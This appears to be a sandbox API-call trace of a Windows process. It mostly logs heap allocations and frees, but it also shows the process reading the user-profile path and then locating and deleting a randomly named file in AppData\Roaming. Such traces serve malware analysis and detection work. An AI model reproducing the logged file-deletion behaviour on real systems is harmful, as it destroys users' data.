HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0199.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0199.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0199.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0199.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0199.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0199.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0199.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0199.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0199.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0199.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0199.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0199.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0199.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0199.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0199.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0199.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3519750 | out: hHeap=0x25c0000) returned 1 [0199.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0199.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0199.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0199.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0199.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0199.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0199.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0199.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0199.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0199.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0199.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0199.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0199.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0199.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0199.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0199.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0199.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0199.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0199.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0199.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0199.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0199.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0199.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0199.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0199.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0199.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0199.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0199.292] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0199.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0199.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0199.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0199.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0199.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0199.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0199.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0199.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0199.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0199.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0199.292] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0199.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0199.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0199.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c18 [0199.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0199.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0199.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e40 [0199.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0199.293] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0199.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0199.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0199.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0199.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0199.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0199.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0199.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0199.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0199.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0199.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0199.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0199.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0199.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0199.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0199.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0199.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0199.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0199.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0199.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0199.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0199.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0199.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0199.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0199.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0199.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0199.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0199.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7c) returned 0x24f1fe0 [0199.294] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Go gw9icCK1.m4a", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Go gw9icCK1.m4a", lpFilePart=0x8bedfc*="Go gw9icCK1.m4a") returned 0x3d [0199.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0199.294] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Go gw9icCK1.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\go gw9icck1.m4a")) returned 0x2020 [0199.295] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Go gw9icCK1.m4a", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x458fa210, ftCreationTime.dwHighDateTime=0x1d4d027, ftLastAccessTime.dwLowDateTime=0x66ab0250, ftLastAccessTime.dwHighDateTime=0x1d4cdf2, ftLastWriteTime.dwLowDateTime=0x66ab0250, ftLastWriteTime.dwHighDateTime=0x1d4cdf2, nFileSizeHigh=0x0, nFileSizeLow=0x11372, dwReserved0=0xb34, dwReserved1=0x4, cFileName="Go gw9icCK1.m4a", cAlternateFileName="GOGW9I~1.M4A")) returned 0xaa58e0 [0199.295] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Go gw9icCK1.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\go gw9icck1.m4a")) returned 1 [0199.296] FindNextFileW (in: hFindFile=0xaa58e0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x458fa210, ftCreationTime.dwHighDateTime=0x1d4d027, ftLastAccessTime.dwLowDateTime=0x66ab0250, ftLastAccessTime.dwHighDateTime=0x1d4cdf2, ftLastWriteTime.dwLowDateTime=0x66ab0250, ftLastWriteTime.dwHighDateTime=0x1d4cdf2, nFileSizeHigh=0x0, nFileSizeLow=0x11372, dwReserved0=0xb34, dwReserved1=0x4, cFileName="Go gw9icCK1.m4a", cAlternateFileName="GOGW9I~1.M4A")) returned 0 [0199.296] FindClose (in: hFindFile=0xaa58e0 | out: hFindFile=0xaa58e0) returned 1 [0199.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0199.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0199.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0199.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0199.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0199.297] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0199.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0199.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0199.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0199.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0199.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0199.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0199.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0199.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0199.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0199.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0199.297] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0199.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0199.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0199.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e40 [0199.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0199.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0199.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fa8 [0199.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0199.298] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0199.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0199.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0199.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0199.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0199.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0199.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0199.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0199.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0199.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0199.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0199.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0199.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0199.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0199.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0199.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0199.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0199.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0199.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0199.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0199.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0199.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0199.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0199.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0199.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0199.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0199.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0199.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0199.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0199.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0199.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0199.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0199.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0199.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0199.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0199.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0199.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0199.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0199.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7c) returned 0x24f1fe0 [0199.299] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Go gw9icCK1.m4a", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Go gw9icCK1.m4a", lpFilePart=0x8bf658*="Go gw9icCK1.m4a") returned 0x3d [0199.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0199.299] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Go gw9icCK1.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\go gw9icck1.m4a")) returned 0xffffffff [0199.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0199.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0199.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0199.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0199.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0199.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0199.300] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0199.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0199.300] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0199.300] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0199.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0199.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0199.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0199.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0199.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0199.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0199.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0199.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0199.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0199.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0199.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0199.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0199.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0199.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Identities", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0199.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dentities", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0199.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="entities", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0199.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ntities", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0199.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tities", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0199.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ities", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0199.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0199.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0199.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0199.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0199.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0199.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0199.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0199.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0199.301] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0199.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0199.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0199.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0199.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0199.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0199.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0199.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0199.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0199.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0199.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0199.302] RtlAllocateHeap 